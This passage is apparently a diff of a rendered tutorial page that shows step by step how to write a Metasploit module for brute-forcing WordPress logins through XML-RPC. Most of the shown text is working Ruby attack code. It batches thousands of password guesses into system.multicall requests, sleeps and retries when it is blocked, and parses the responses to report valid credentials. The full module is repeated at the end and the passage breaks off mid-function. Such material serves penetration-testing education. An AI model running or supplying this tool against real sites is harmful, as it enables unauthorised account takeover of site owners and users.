<span class="hljs-tag"><<span class="hljs-title">string</span>></span>Docker wordpress<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1331
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1332
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1333
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1334
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>xmlrpc<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1335
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1336
|
+
<span class="hljs-tag"><<span class="hljs-title">string</span>></span>http://172.17.0.3/xmlrpc.php<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1337
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1338
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1339
|
+
<span class="hljs-tag"></<span class="hljs-title">struct</span>></span>
|
1340
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1341
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span>
|
1342
|
+
<span class="hljs-tag"></<span class="hljs-title">array</span>></span>
|
1343
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1344
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span>
|
1345
|
+
<span class="hljs-tag"></<span class="hljs-title">array</span>></span>
|
1346
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1347
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span>
|
1348
|
+
<span class="hljs-tag"></<span class="hljs-title">array</span>></span>
|
1349
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1350
|
+
<span class="hljs-tag"></<span class="hljs-title">param</span>></span>
|
1351
|
+
<span class="hljs-tag"></<span class="hljs-title">params</span>></span>
|
1352
|
+
<span class="hljs-tag"></<span class="hljs-title">methodResponse</span>></span>
|
1353
|
+
</code></pre>
|
1354
|
+
<p>We noticed that long reply with the result of called method <code>wp.getUsersBlogs</code></p>
|
1355
|
+
<p>Awesome, right?</p>
|
1356
|
+
<p>The tricky part is just begun! Since we will be sending thousands of passwords in one request and the reply will be rally huge XML files, how we'll find the position of the correct credentials? The answer is, by using the powerful ruby iteration methods, particularly <code>each_with_index</code> method.</p>
|
1357
|
+
<p>Enough talking, show me the code!</p>
|
1358
|
+
<h4 id="what-do-we-want"><a name="what-do-we-want" class="plugin-anchor" href="#what-do-we-want"><span class="fa fa-link"></span></a>What do we want?</h4>
|
1359
|
+
<ul>
|
1360
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Create Auxiliary module</li>
|
1361
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Deal with Web Application </li>
|
1362
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Deal with WordPress </li>
|
1363
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Describe The module</li>
|
1364
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Let people know we created this module</li>
|
1365
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Add references about the vulnerability that we exploit</li>
|
1366
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Options to set the target URI, port, user, pass list.</li>
|
1367
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Read username and password lists as arrays </li>
|
1368
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Build/Generate XML file takes a user and iterate around the passwords</li>
|
1369
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if target is running WordPress </li>
|
1370
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if target enabling RPC</li>
|
1371
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Setup the HTTP with XML POST request</li>
|
1372
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Parse XML request and response </li>
|
1373
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Find the exact correct credentials </li>
|
1374
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if we got blocked</li>
|
1375
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Parsing the result and find which password is correct </li>
|
1376
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if the module has been written correctly (msftidy.rb)</li>
|
1377
|
+
</ul>
|
1378
|
+
<h4 id="steps"><a name="steps" class="plugin-anchor" href="#steps"><span class="fa fa-link"></span></a>Steps</h4>
|
1379
|
+
<ul>
|
1380
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Create Auxiliary module</li>
|
1381
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Deal with Web Application </li>
|
1382
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Deal with WordPress </li>
|
1383
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Describe The module</li>
|
1384
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Let people know we created this module</li>
|
1385
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Add references about the vulnerability that we exploit</li>
|
1386
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Options to set the target URI, port, user, pass list.</li>
|
1387
|
+
</ul>
|
1388
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">##</span>
|
1389
|
+
<span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
|
1390
|
+
<span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
|
1391
|
+
<span class="hljs-comment">##</span>
|
1392
|
+
|
1393
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'msf/core'</span>
|
1394
|
+
|
1395
|
+
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">< <span class="hljs-parent">Msf::Auxiliary</span></span></span>
|
1396
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HttpClient</span>
|
1397
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HTTP::Wordpress</span>
|
1398
|
+
|
1399
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
|
1400
|
+
<span class="hljs-keyword">super</span>(update_info(
|
1401
|
+
info,
|
1402
|
+
<span class="hljs-string">'Name'</span> => <span class="hljs-string">'WordPress XML-RPC Massive Brute Force'</span>,
|
1403
|
+
<span class="hljs-string">'Description'</span> => <span class="hljs-string">%q{WordPress massive brute force attacks via WordPress XML-RPC service.}</span>,
|
1404
|
+
<span class="hljs-string">'License'</span> => <span class="hljs-constant">MSF_LICENSE</span>,
|
1405
|
+
<span class="hljs-string">'Author'</span> =>
|
1406
|
+
[
|
1407
|
+
<span class="hljs-string">'Sabri (@KINGSABRI)'</span>, <span class="hljs-comment"># Module Writer</span>
|
1408
|
+
<span class="hljs-string">'William (WCoppola@Lares.com)'</span> <span class="hljs-comment"># Module Requester</span>
|
1409
|
+
],
|
1410
|
+
<span class="hljs-string">'References'</span> =>
|
1411
|
+
[
|
1412
|
+
[<span class="hljs-string">'URL'</span>, <span class="hljs-string">'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'</span>],
|
1413
|
+
[<span class="hljs-string">'URL'</span>, <span class="hljs-string">'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html'</span>]
|
1414
|
+
]
|
1415
|
+
))
|
1416
|
+
|
1417
|
+
register_options(
|
1418
|
+
[
|
1419
|
+
<span class="hljs-constant">OptString</span>.new(<span class="hljs-string">'TARGETURI'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'The base path'</span>, <span class="hljs-string">'/'</span>]),
|
1420
|
+
<span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">'WPUSER_FILE'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'File containing usernames, one per line'</span>,
|
1421
|
+
<span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">"wordlists"</span>, <span class="hljs-string">"http_default_users.txt"</span>) ]),
|
1422
|
+
<span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">'WPPASS_FILE'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'File containing passwords, one per line'</span>,
|
1423
|
+
<span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">"wordlists"</span>, <span class="hljs-string">"http_default_pass.txt"</span>)]),
|
1424
|
+
<span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">'BLOCKEDWAIT'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'Time(minutes) to wait if got blocked'</span>, <span class="hljs-number">6</span>]),
|
1425
|
+
<span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">'CHUNKSIZE'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'Number of passwords need to be sent per request. (1700 is the max)'</span>, <span class="hljs-number">1500</span>])
|
1426
|
+
], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
|
1427
|
+
<span class="hljs-keyword">end</span>
|
1428
|
+
<span class="hljs-keyword">end</span>
|
1429
|
+
</code></pre>
|
1430
|
+
<ul>
|
1431
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Read username and password lists as arrays </li>
|
1432
|
+
</ul>
|
1433
|
+
<pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">usernames</span></span>
|
1434
|
+
<span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">'WPUSER_FILE'</span>]).map {|user| user.chomp}
|
1435
|
+
<span class="hljs-keyword">end</span>
|
1436
|
+
|
1437
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">passwords</span></span>
|
1438
|
+
<span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">'WPPASS_FILE'</span>]).map {|pass| pass.chomp}
|
1439
|
+
<span class="hljs-keyword">end</span>
|
1440
|
+
</code></pre>
|
1441
|
+
<ul>
|
1442
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Build/Generate XML file takes a user and iterate around the passwords</li>
|
1443
|
+
</ul>
|
1444
|
+
<pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
|
1445
|
+
<span class="hljs-comment"># XML Factory</span>
|
1446
|
+
<span class="hljs-comment">#</span>
|
1447
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">generate_xml</span><span class="hljs-params">(user)</span></span>
|
1448
|
+
|
1449
|
+
vprint_warning(<span class="hljs-string">'Generating XMLs may take a while depends on the list file(s) size.'</span>) <span class="hljs-keyword">if</span> passwords.size > <span class="hljs-number">1500</span>
|
1450
|
+
xml_payloads = [] <span class="hljs-comment"># Container for all generated XMLs</span>
|
1451
|
+
<span class="hljs-comment"># Evil XML | Limit number of log-ins to CHUNKSIZE/request due WordPress limitation which is 1700 maximum.</span>
|
1452
|
+
passwords.each_slice(datastore[<span class="hljs-string">'CHUNKSIZE'</span>]) <span class="hljs-keyword">do</span> |pass_group|
|
1453
|
+
|
1454
|
+
document = <span class="hljs-constant">Nokogiri::XML::Builder</span>.new <span class="hljs-keyword">do</span> |xml|
|
1455
|
+
xml.methodCall {
|
1456
|
+
xml.methodName(<span class="hljs-string">"system.multicall"</span>)
|
1457
|
+
xml.params {
|
1458
|
+
xml.param {
|
1459
|
+
xml.value {
|
1460
|
+
xml.array {
|
1461
|
+
xml.data {
|
1462
|
+
|
1463
|
+
pass_group.each <span class="hljs-keyword">do</span> |pass|
|
1464
|
+
xml.value {
|
1465
|
+
xml.struct {
|
1466
|
+
xml.member {
|
1467
|
+
xml.name(<span class="hljs-string">"methodName"</span>)
|
1468
|
+
xml.value { xml.string(<span class="hljs-string">"wp.getUsersBlogs"</span>) }}
|
1469
|
+
xml.member {
|
1470
|
+
xml.name(<span class="hljs-string">"params"</span>)
|
1471
|
+
xml.value {
|
1472
|
+
xml.array {
|
1473
|
+
xml.data {
|
1474
|
+
xml.value {
|
1475
|
+
xml.array {
|
1476
|
+
xml.data {
|
1477
|
+
xml.value { xml.string(user) }
|
1478
|
+
xml.value { xml.string(pass) }
|
1479
|
+
}}}}}}}}}
|
1480
|
+
<span class="hljs-keyword">end</span>
|
1481
|
+
|
1482
|
+
}}}}}}
|
1483
|
+
<span class="hljs-keyword">end</span>
|
1484
|
+
|
1485
|
+
xml_payloads << document.to_xml
|
1486
|
+
<span class="hljs-keyword">end</span>
|
1487
|
+
|
1488
|
+
vprint_status(<span class="hljs-string">'Generating XMLs just done.'</span>)
|
1489
|
+
xml_payloads
|
1490
|
+
<span class="hljs-keyword">end</span>
|
1491
|
+
</code></pre>
|
1492
|
+
<ul>
|
1493
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if target is running WordPress </li>
|
1494
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if target enabling RPC</li>
|
1495
|
+
</ul>
|
1496
|
+
<pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
|
1497
|
+
<span class="hljs-comment"># Check target status</span>
|
1498
|
+
<span class="hljs-comment">#</span>
|
1499
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check_wpstatus</span></span>
|
1500
|
+
print_status(<span class="hljs-string">"Checking <span class="hljs-subst">#{peer}</span> status!"</span>)
|
1501
|
+
|
1502
|
+
<span class="hljs-keyword">if</span> !wordpress_and_online?
|
1503
|
+
print_error(<span class="hljs-string">"<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{target_uri}</span> does not appear to be running WordPress or you got blocked! (Do Manual Check)"</span>)
|
1504
|
+
<span class="hljs-keyword">nil</span>
|
1505
|
+
<span class="hljs-keyword">elsif</span> !wordpress_xmlrpc_enabled?
|
1506
|
+
print_error(<span class="hljs-string">"<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{wordpress_url_xmlrpc}</span> does not enable XML-RPC"</span>)
|
1507
|
+
<span class="hljs-keyword">nil</span>
|
1508
|
+
<span class="hljs-keyword">else</span>
|
1509
|
+
print_status(<span class="hljs-string">"Target <span class="hljs-subst">#{peer}</span> is running WordPress"</span>)
|
1510
|
+
<span class="hljs-keyword">true</span>
|
1511
|
+
<span class="hljs-keyword">end</span>
|
1512
|
+
|
1513
|
+
<span class="hljs-keyword">end</span>
|
1514
|
+
</code></pre>
|
1515
|
+
<ul>
|
1516
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Setup the HTTP with XML POST request</li>
|
1517
|
+
</ul>
|
1518
|
+
<pre><code class="lang-ruby"> <span class="hljs-comment">#</span>
|
1519
|
+
<span class="hljs-comment"># Connection Setup</span>
|
1520
|
+
<span class="hljs-comment">#</span>
|
1521
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send</span><span class="hljs-params">(xml)</span></span>
|
1522
|
+
uri = target_uri.path
|
1523
|
+
opts =
|
1524
|
+
{
|
1525
|
+
<span class="hljs-string">'method'</span> => <span class="hljs-string">'POST'</span>,
|
1526
|
+
<span class="hljs-string">'uri'</span> => normalize_uri(uri, wordpress_url_xmlrpc),
|
1527
|
+
<span class="hljs-string">'data'</span> => xml,
|
1528
|
+
<span class="hljs-string">'ctype'</span> =><span class="hljs-string">'text/xml'</span>
|
1529
|
+
}
|
1530
|
+
client = <span class="hljs-constant">Rex::Proto::Http::Client</span>.new(rhost)
|
1531
|
+
client.connect
|
1532
|
+
req = client.request_cgi(opts)
|
1533
|
+
res = client.send_recv(req)
|
1534
|
+
|
1535
|
+
<span class="hljs-keyword">if</span> res && res.code != <span class="hljs-number">200</span>
|
1536
|
+
print_error(<span class="hljs-string">'It seems you got blocked!'</span>)
|
1537
|
+
print_warning(<span class="hljs-string">"I'll sleep for <span class="hljs-subst">#{datastore[<span class="hljs-string">'BLOCKEDWAIT'</span>]}</span> minutes, then I'll try again. CTR+C to exit"</span>)
|
1538
|
+
sleep datastore[<span class="hljs-string">'BLOCKEDWAIT'</span>] * <span class="hljs-number">60</span>
|
1539
|
+
<span class="hljs-keyword">end</span>
|
1540
|
+
<span class="hljs-variable">@res</span> = res
|
1541
|
+
<span class="hljs-keyword">end</span>
|
1542
|
+
</code></pre>
|
1543
|
+
<ul>
|
1544
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Parse XML request and response </li>
|
1545
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Find the exact correct credentials </li>
|
1546
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if we got blocked</li>
|
1547
|
+
<li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Parsing the result and find which password is correct </li>
|
1548
|
+
</ul>
|
1549
|
+
<pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span></span>
|
1550
|
+
<span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> check_wpstatus.<span class="hljs-keyword">nil</span>?
|
1551
|
+
|
1552
|
+
usernames.each <span class="hljs-keyword">do</span> |user|
|
1553
|
+
passfound = <span class="hljs-keyword">false</span>
|
1554
|
+
|
1555
|
+
print_status(<span class="hljs-string">"Brute forcing user: <span class="hljs-subst">#{user}</span>"</span>)
|
1556
|
+
generate_xml(user).each <span class="hljs-keyword">do</span> |xml|
|
1557
|
+
<span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> passfound == <span class="hljs-keyword">true</span>
|
1558
|
+
|
1559
|
+
send(xml)
|
1560
|
+
|
1561
|
+
<span class="hljs-comment"># Request Parser</span>
|
1562
|
+
req_xml = <span class="hljs-constant">Nokogiri::Slop</span> xml
|
1563
|
+
<span class="hljs-comment"># Response Parser</span>
|
1564
|
+
res_xml = <span class="hljs-constant">Nokogiri::Slop</span> <span class="hljs-variable">@res</span>.to_s.scan(<span class="hljs-regexp">/<.*>/</span>).join
|
1565
|
+
puts res_xml
|
1566
|
+
res_xml.search(<span class="hljs-string">"methodResponse/params/param/value/array/data/value"</span>).each_with_index <span class="hljs-keyword">do</span> |value, i|
|
1567
|
+
|
1568
|
+
result = value.at(<span class="hljs-string">"struct/member/value/int"</span>)
|
1569
|
+
<span class="hljs-comment"># If response error code doesn't not exist, then it's the correct credentials!</span>
|
1570
|
+
<span class="hljs-keyword">if</span> result.<span class="hljs-keyword">nil</span>?
|
1571
|
+
user = req_xml.search(<span class="hljs-string">"data/value/array/data"</span>)[i].value[<span class="hljs-number">0</span>].text.strip
|
1572
|
+
pass = req_xml.search(<span class="hljs-string">"data/value/array/data"</span>)[i].value[<span class="hljs-number">1</span>].text.strip
|
1573
|
+
print_good(<span class="hljs-string">"Credentials Found! <span class="hljs-subst">#{user}</span>:<span class="hljs-subst">#{pass}</span>"</span>)
|
1574
|
+
|
1575
|
+
passfound = <span class="hljs-keyword">true</span>
|
1576
|
+
<span class="hljs-keyword">end</span>
|
1577
|
+
|
1578
|
+
<span class="hljs-keyword">end</span>
|
1579
|
+
|
1580
|
+
<span class="hljs-keyword">unless</span> user == usernames.last
|
1581
|
+
vprint_status(<span class="hljs-string">'Sleeping for 2 seconds..'</span>)
|
1582
|
+
sleep <span class="hljs-number">2</span>
|
1583
|
+
<span class="hljs-keyword">end</span>
|
1584
|
+
|
1585
|
+
<span class="hljs-keyword">end</span>
|
1586
|
+
<span class="hljs-keyword">end</span>
|
1587
|
+
<span class="hljs-keyword">end</span>
|
1588
|
+
</code></pre>
|
1589
|
+
<h4 id="wrapping-up"><a name="wrapping-up" class="plugin-anchor" href="#wrapping-up"><span class="fa fa-link"></span></a>Wrapping up</h4>
|
1590
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">##</span>
|
1591
|
+
<span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
|
1592
|
+
<span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
|
1593
|
+
<span class="hljs-comment">##</span>
|
1594
|
+
|
1595
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'msf/core'</span>
|
1596
|
+
|
1597
|
+
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">< <span class="hljs-parent">Msf::Auxiliary</span></span></span>
|
1598
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HttpClient</span>
|
1599
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HTTP::Wordpress</span>
|
1600
|
+
|
1601
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
|
1602
|
+
<span class="hljs-keyword">super</span>(update_info(
|
1603
|
+
info,
|
1604
|
+
<span class="hljs-string">'Name'</span> => <span class="hljs-string">'WordPress XML-RPC Massive Brute Force'</span>,
|
1605
|
+
<span class="hljs-string">'Description'</span> => <span class="hljs-string">%q{WordPress massive brute force attacks via WordPress XML-RPC service.}</span>,
|
1606
|
+
<span class="hljs-string">'License'</span> => <span class="hljs-constant">MSF_LICENSE</span>,
|
1607
|
+
<span class="hljs-string">'Author'</span> =>
|
1608
|
+
[
|
1609
|
+
<span class="hljs-string">'Sabri (@KINGSABRI)'</span>, <span class="hljs-comment"># Module Writer</span>
|
1610
|
+
<span class="hljs-string">'William (WCoppola@Lares.com)'</span> <span class="hljs-comment"># Module Requester</span>
|
1611
|
+
],
|
1612
|
+
<span class="hljs-string">'References'</span> =>
|
1613
|
+
[
|
1614
|
+
[<span class="hljs-string">'URL'</span>, <span class="hljs-string">'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'</span>],
|
1615
|
+
[<span class="hljs-string">'URL'</span>, <span class="hljs-string">'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html'</span>]
|
1616
|
+
]
|
1617
|
+
))
|
1618
|
+
|
1619
|
+
register_options(
|
1620
|
+
[
|
1621
|
+
<span class="hljs-constant">OptString</span>.new(<span class="hljs-string">'TARGETURI'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'The base path'</span>, <span class="hljs-string">'/'</span>]),
|
1622
|
+
<span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">'WPUSER_FILE'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'File containing usernames, one per line'</span>,
|
1623
|
+
<span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">"wordlists"</span>, <span class="hljs-string">"http_default_users.txt"</span>) ]),
|
1624
|
+
<span class="hljs-constant">OptPath</span>.new(<span class="hljs-string">'WPPASS_FILE'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'File containing passwords, one per line'</span>,
|
1625
|
+
<span class="hljs-constant">File</span>.join(<span class="hljs-constant">Msf::Config</span>.data_directory, <span class="hljs-string">"wordlists"</span>, <span class="hljs-string">"http_default_pass.txt"</span>)]),
|
1626
|
+
<span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">'BLOCKEDWAIT'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'Time(minutes) to wait if got blocked'</span>, <span class="hljs-number">6</span>]),
|
1627
|
+
<span class="hljs-constant">OptInt</span>.new(<span class="hljs-string">'CHUNKSIZE'</span>, [<span class="hljs-keyword">true</span>, <span class="hljs-string">'Number of passwords need to be sent per request. (1700 is the max)'</span>, <span class="hljs-number">1500</span>])
|
1628
|
+
], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
|
1629
|
+
<span class="hljs-keyword">end</span>
|
1630
|
+
|
1631
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">usernames</span></span>
|
1632
|
+
<span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">'WPUSER_FILE'</span>]).map {|user| user.chomp}
|
1633
|
+
<span class="hljs-keyword">end</span>
|
1634
|
+
|
1635
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">passwords</span></span>
|
1636
|
+
<span class="hljs-constant">File</span>.readlines(datastore[<span class="hljs-string">'WPPASS_FILE'</span>]).map {|pass| pass.chomp}
|
1637
|
+
<span class="hljs-keyword">end</span>
|
1638
|
+
|
1639
|
+
<span class="hljs-comment">#</span>
|
1640
|
+
<span class="hljs-comment"># XML Factory</span>
|
1641
|
+
<span class="hljs-comment">#</span>
|
1642
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">generate_xml</span><span class="hljs-params">(user)</span></span>
|
1643
|
+
|
1644
|
+
vprint_warning(<span class="hljs-string">'Generating XMLs may take a while depends on the list file(s) size.'</span>) <span class="hljs-keyword">if</span> passwords.size > <span class="hljs-number">1500</span>
|
1645
|
+
xml_payloads = [] <span class="hljs-comment"># Container for all generated XMLs</span>
|
1646
|
+
<span class="hljs-comment"># Evil XML | Limit number of log-ins to CHUNKSIZE/request due WordPress limitation which is 1700 maximum.</span>
|
1647
|
+
passwords.each_slice(datastore[<span class="hljs-string">'CHUNKSIZE'</span>]) <span class="hljs-keyword">do</span> |pass_group|
|
1648
|
+
|
1649
|
+
document = <span class="hljs-constant">Nokogiri::XML::Builder</span>.new <span class="hljs-keyword">do</span> |xml|
|
1650
|
+
xml.methodCall {
|
1651
|
+
xml.methodName(<span class="hljs-string">"system.multicall"</span>)
|
1652
|
+
xml.params {
|
1653
|
+
xml.param {
|
1654
|
+
xml.value {
|
1655
|
+
xml.array {
|
1656
|
+
xml.data {
|
1657
|
+
|
1658
|
+
pass_group.each <span class="hljs-keyword">do</span> |pass|
|
1659
|
+
xml.value {
|
1660
|
+
xml.struct {
|
1661
|
+
xml.member {
|
1662
|
+
xml.name(<span class="hljs-string">"methodName"</span>)
|
1663
|
+
xml.value { xml.string(<span class="hljs-string">"wp.getUsersBlogs"</span>) }}
|
1664
|
+
xml.member {
|
1665
|
+
xml.name(<span class="hljs-string">"params"</span>)
|
1666
|
+
xml.value {
|
1667
|
+
xml.array {
|
1668
|
+
xml.data {
|
1669
|
+
xml.value {
|
1670
|
+
xml.array {
|
1671
|
+
xml.data {
|
1672
|
+
xml.value { xml.string(user) }
|
1673
|
+
xml.value { xml.string(pass) }
|
1674
|
+
}}}}}}}}}
|
1675
|
+
<span class="hljs-keyword">end</span>
|
1676
|
+
|
1677
|
+
}}}}}}
|
1678
|
+
<span class="hljs-keyword">end</span>
|
1679
|
+
|
1680
|
+
xml_payloads << document.to_xml
|
1681
|
+
<span class="hljs-keyword">end</span>
|
1682
|
+
|
1683
|
+
vprint_status(<span class="hljs-string">'Generating XMLs just done.'</span>)
|
1684
|
+
xml_payloads
|
1685
|
+
<span class="hljs-keyword">end</span>
|
1686
|
+
|
1687
|
+
<span class="hljs-comment">#</span>
|
1688
|
+
<span class="hljs-comment"># Check target status</span>
|
1689
|
+
<span class="hljs-comment">#</span>
|
1690
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check_wpstatus</span></span>
|
1691
|
+
print_status(<span class="hljs-string">"Checking <span class="hljs-subst">#{peer}</span> status!"</span>)
|
1692
|
+
|
1693
|
+
<span class="hljs-keyword">if</span> !wordpress_and_online?
|
1694
|
+
print_error(<span class="hljs-string">"<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{target_uri}</span> does not appear to be running WordPress or you got blocked! (Do Manual Check)"</span>)
|
1695
|
+
<span class="hljs-keyword">nil</span>
|
1696
|
+
<span class="hljs-keyword">elsif</span> !wordpress_xmlrpc_enabled?
|
1697
|
+
print_error(<span class="hljs-string">"<span class="hljs-subst">#{peer}</span>:<span class="hljs-subst">#{rport}</span><span class="hljs-subst">#{wordpress_url_xmlrpc}</span> does not enable XML-RPC"</span>)
|
1698
|
+
<span class="hljs-keyword">nil</span>
|
1699
|
+
<span class="hljs-keyword">else</span>
|
1700
|
+
print_status(<span class="hljs-string">"Target <span class="hljs-subst">#{peer}</span> is running WordPress"</span>)
|
1701
|
+
<span class="hljs-keyword">true</span>
|
1702
|
+
<span class="hljs-keyword">end</span>
|
1703
|
+
|
1704
|
+
<span class="hljs-keyword">end</span>
|
1705
|
+
|
1706
|
+
<span class="hljs-comment">#</span>
|
1707
|
+
<span class="hljs-comment"># Connection Setup</span>
|
1708
|
+
<span class="hljs-comment">#</span>
|
1709
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send</span><span class="hljs-params">(xml)</span></span>
|
1710
|
+
uri = target_uri.path
|
1711
|
+
opts =
|
1712
|
+
{
|
1713
|
+
<span class="hljs-string">'method'</span> => <span class="hljs-string">'POST'</span>,
|
1714
|
+
<span class="hljs-string">'uri'</span> => normalize_uri(uri, wordpress_url_xmlrpc),
|
1715
|
+
<span class="hljs-string">'data'</span> => xml,
|
1716
|
+
<span class="hljs-string">'ctype'</span> =><span class="hljs-string">'text/xml'</span>
|
1717
|
+
}
|
1718
|
+
client = <span class="hljs-constant">Rex::Proto::Http::Client</span>.new(rhost)
|
1719
|
+
client.connect
|
1720
|
+
req = client.request_cgi(opts)
|
1721
|
+
res = client.send_recv(req)
|
1722
|
+
|
1723
|
+
